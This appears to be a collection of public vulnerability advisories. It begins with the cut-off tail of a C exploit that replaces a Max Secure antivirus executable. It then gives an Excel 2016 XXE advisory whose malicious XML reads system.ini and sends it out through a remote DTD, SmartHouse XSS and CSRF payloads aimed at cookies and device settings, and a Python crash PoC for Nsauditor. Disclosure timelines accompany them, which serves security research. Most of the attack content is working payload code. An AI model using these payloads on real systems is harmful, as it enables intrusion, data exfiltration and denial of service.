         CopyFile(fname, TARGET, FALSE);
         printf("[+] Replaced legit Max Secure EXE...\n");
         Sleep(2000);
         printf("[+] Done!\n");
         MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus
Plus\\MaxPwn.lnk");
         Sleep(1000);
         exit(0);
        }
    }else{
      if(FileExists(TMP)){
         remove(TMP);
      }
       printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
       printf("[+] hyp3rlinx\n");
       system("pause");
     }
}


[POC Video URL]https://www.youtube.com/watch?v=DXSV5geXkTw


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: November 19, 2019
Vendor: "received a reply they will fix soon"
Status request: November 24, 2019
No replies other than automated response.
November 29, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec          


[Vendor]
www.microsoft.com


[Product]
Excel 2016 v1901

Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS.
It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. 


[CVE]
N/A


[Vulnerability Type]
Error Import Based XML External Entity Injection


[Security Issue]
Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as
Html page" functionality upon receiving errors importing a specially crafted XML file.

This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability.

Tested successfuly Windows 10 .NET framework version v4.0.30319.

C:\>dir /b %windir%\Microsoft.NET\Framework\v*
v4.0.30319


[Exploit/POC]
Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML'

1) You will get error like: 

"Error:

Unable to connect

We encountered an error while trying to connect.

The user will then get an option to 'Edit' where they can import the file as an HTML file

Result Local data can be exfiltrated to remote server"

2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel

User has choose to import as HTML then XXE attack will succeed:

e.g.

127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO
/1.1" 200 -


Malicious XML file to load as New Data Query

"test.xml"

<?xml version='1.0'?>
<!DOCTYPE root [ 
<!ENTITY % file SYSTEM 'C:\Windows\system.ini'>
<!ENTITY % dtd SYSTEM 'http://127.0.0.1:8000/payload.dtd'>
%dtd;]>
<pwn>&send;</pwn>



[Network Access]
Local


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: May 10, 2019
MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release.
Engineering Team may or may not fix in a future version of the release."
November 30, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities


Vendor: Carlo Gavazzi Automation S.p.A
Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
Affected version: Web-app: 6.5.33.17072501
                  Web-app: 6.5.32.17062101
                  Web-app: 6.2.3.16102701
                  Web-app: 5.5.3.160421101
                  Web-app: 5.3.3.15120101
                  Release: 1.0.5.1
                  Release: 1.0.5.0
                  Release: 1.0.3.5
                  Release: 1.0.3.2

Summary: Carlo Gavazzi is an international company that develops, manufactures
and sells electrical automation components. Our products are used in industrial
automation and real estate automation. Smart-house is based on a system that we
have developed and produced since 1986, mainly for industrial-related installations.
Our system is present in more than 150,000 installations. For a few years now, we
have focused our development on smart electrical installations for home and property
automation. Smart-house is currently installed in both villas and commercial properties.

Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform certain actions with
administrative privileges if a logged-in user visits a malicious web site. Input passed
to several GET/POST parameters is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session
in context of an affected site.

Tested on: Apache
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5543
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php


01.11.2019

--


Reflected XSS (GET):
--------------------

1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)


CSRF set temperature:
---------------------

<html>
<body>
<form action="http://192.168.0.24/app/datasend.php" method="POST">
<input type="hidden" name="IDFunction" value="3875" />
<input type="hidden" name="favorite" value="0" />
<input type="hidden" name="rooms" value="-1" />
<input type="hidden" name="userId" value="-300" />
<input type="hidden" name="heat_ensave_set" value="24" />
<input type="hidden" name="heat_set" value="25.5" />
<input type="submit" value="Set" />
</form>
</body>
</html>


Stored XSS (POST):
------------------

<html>
<body>
<form action="http://192.168.0.24/app/command.php" method="POST">
<input type="hidden" name="op" value="11" />
<input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
<input type="hidden" name="period" value="2" />
<input type="hidden" name="gg" value="6" />
<input type="hidden" name="ggf" value="6" />
<input type="hidden" name="mm" value="11" />
<input type="hidden" name="mmf" value="11" />
<input type="hidden" name="aa" value="2019" />
<input type="hidden" name="aaf" value="2019" />
<input type="hidden" name="param" value="[1]" />
<input type="submit" value="Send" />
</form>
</body>
</html>


Reflected XSS (POST):
---------------------

<html>
<body>
<form action="http://192.168.0.24/refresh.php">
<input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
<input type="hidden" name="param[0][]" value="0251" />
<input type="hidden" name="param[0][]" value="switch" />
<input type="hidden" name="param[1][]" value="switch1250" />
<input type="hidden" name="param[1][]" value="1250" />
<input type="hidden" name="param[1][]" value="switch" />
<input type="submit" value="Send" />
</form>
</body>
</html>

# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
# Discovery by: SajjadBnd
# Date: 2019-11-30
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.1.8.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 - Pro

# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, 
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that 
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing 
# software significantly reduces the total cost of network management in enterprise environments by enabling 
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without 
# installing server-side applications on these computers and create a report of potential problems that were found.

# PoC
# 1.Run the python script, it will create a new file "dos.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of dos.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Crashed ;)


#!/usr/bin/env python
buffer = "\x41" * 1000
try:
    f=open("dos.txt","w")
    print "[+] Creating %s bytes DOS payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"